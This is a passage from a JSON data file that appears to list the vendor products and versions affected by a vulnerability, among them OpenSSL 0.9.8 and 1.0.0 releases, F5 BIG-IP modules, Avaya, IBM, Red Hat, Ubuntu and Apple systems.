0.3, "vendor": "f5", "version": "6.2" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "project openssl 0.9.8p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20070" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "3.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "hardware management console 7r7.3.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.3" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "linux ia-64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.2" }, { "model": "big-ip ltm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "messaging storage server", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.14" }, { "model": "project openssl 0.9.8s", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.0" }, { "model": "linux enterprise server sp3 ltss", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.01" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "voice portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "enterprise linux desktop version", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "linux mandrake x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux workstation", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "meeting exchange sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux desktop client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "project openssl 0.9.8q", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.4" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "opensuse", "scope": "eq", "trust": 0.3, "vendor": "s u s e", "version": "11.4" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-453" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "project openssl 1.0.0f", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts sparc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.50" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "tivoli netcool/system service monitor fp10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip aam", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "onboard administrator", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.55" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.0" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56001" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.5" }, { "model": "big-ip psm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip apm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5.00" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.4" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.1" }, { "model": "project openssl 0.9.8g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "voice portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "4" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5.1.2" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "meeting exchange sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip asm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411.1.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4" }, { "model": "meeting exchange", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "jboss enterprise web server for solaris", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip afm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "xiv storage system gen3 mtm", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.2" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.3" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli netcool/system service monitor fp13", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "tivoli remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "message networking sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux enterprise server for vmware sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "infosphere balanced warehouse d5100", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "enterprise linux ws", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp6", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "cloudburst", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2" }, { "model": "hardware management console 7r7.2.0 sp2", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.7" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura system manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "junos space", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "enterprise server x86 64", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1" }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip afm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.3" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.2" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2010.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "jboss enterprise application platform", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "enterprise linux hpc node optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "onboard administrator", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3.56" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.12" }, { "model": "tivoli endpoint manager for remote control", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.3" }, { "model": "enterprise server", "scope": "eq", "trust": 0.3, "vendor": "mandrakesoft", "version": "5" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "meeting exchange", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-467" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "esx", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "fiery print controller", "scope": "eq", "trust": 0.3, "vendor": "efi", "version": "2.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "docucolor dc260", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "docucolor dc242", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "linux enterprise server sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.13" }, { "model": "aura sip enablement services sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura communication manager utility services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.1" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.9" }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "linux lts lpia", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.1.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": 